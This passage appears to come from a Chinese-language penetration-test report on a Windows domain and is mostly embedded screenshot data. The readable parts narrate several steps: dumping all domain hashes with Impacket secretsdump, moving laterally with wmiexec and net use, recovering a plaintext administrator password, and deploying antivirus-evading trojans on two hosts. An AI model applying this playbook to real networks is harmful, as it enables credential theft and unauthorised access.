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
<p blockindex=38>利用impacket工具模块secretsdump再次抓取域内所有用户hash<br>
<img src="data:image/png;base64,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
<h4 blockindex=39>域内横向移动</h4>
<p blockindex=40>域内主机A<br>
通过域管账号backupuser登陆域内主机A，利用横向移动工具Impacket wmiexec+net use进入命令行界面，上传密码抓取工具GetPass_x64获得明文密码为administrator/TTT@321，也可以上传免杀木马并执行，上线后抓取hash及明文密码<br>
<img src="data:image/png;base64,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
<p blockindex=41>以管理员帐号登录远程桌面后，发现文件夹Share存在大量技术文档<br>
<img src=data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABnAAAAP9CAYAAAC9kyOTAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAgAElEQVR4nOzdeZRk51nn+e977409IiNy3zNrUVWpNu2WrMWSkC1sbLzgtoH2tE1jhoZpoBsz09BMM4AbTjdzmpk5MwcD7mEaDKYxYDBeZUm2FssuyZKsvVRVqjX3rXKPjIyIu7zzR2RmZW1y7Zml+n10ojLyZixvREbmSb2/eJ7H/N3f/Z01xiAiIiIiIiIiIiIiIiJrz1qLKZVK1nXdtV6LiIiIiIiIiIiIiIiIAGEYYoIgUIAjIiIiIiIiIiIiIiKyToRhiLPWixAREREREREREREREZGTKcARERERERERERERERFZZxTgiIiIiIiIiIiIiIiIrDMKcERERERERERERERERNYZBTgiIiIiIiIiIiIiIiLrjAIcERERERERERERERGRdcY750vaKlF1msifAxthjAPGYIwBqH00BjBgPEyis3ZeREREREREREREREREzss5Bzg2LGJLhwjmDxJW5zCEOI6H4zoY4+K4Ti24cVxwk5imD4OJXc61i4iIiIiIiIiIiIiIvCWdc4BjIh9jF3ApEYWzRJUpLD7WcXFcDzwX48QwjgdeErCXcdkiIiIiIiIiIiIiIiJvXefeQs0YHDeBSbfgxBvwSyOEpWEsIRYXi4cxLtY4OOtstI7v+8zOzlKpVE46bq1ddR5Wh07GGOLxBPl8HYlE4gqtVERERERERERERERE5HwCHCzYEGND3HgGa1sIy8exQREcB2xUS0GsXTrPBY/AqVQqTE1N0dTURCx28W3YisUihw8fJooiPM/DWls7AVjLco5jbQQYgiCgVCqRzWbp6uqktbWVVCp1cYuwAbY6SeTPY220NDvILM0RAjCrjlGbMeQkwGsGs74CsVNVq1UmJiZobW3F887jJSUiIiIiIiIiIiIiImd0nrvtFqwPtloLGDBY7IlAxEYYHCz2QrMbAGZnZ3nxxRe55557LkmAU61WWVhYoKenh7q6OqIoWn40NatCHGMMc3NzHD16FGsjxsfHCaOIzo4OksnkhS8iKhMV9+LPHyL058FGtdlBjoNxnJWPxnExTm2eEPFmTOFdYC7ifq+AYrHIc889x4MPPqgAR0RERERERERERGQdGxsbIwzD875eLBajUChckj37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
<p blockindex=42>域内主机B<br>
该主机是一台文件存储服务器，利用横向移动工具Impacket wmiexec+net use上传免杀木马并执行，上线后抓取hash及明文密码<br>
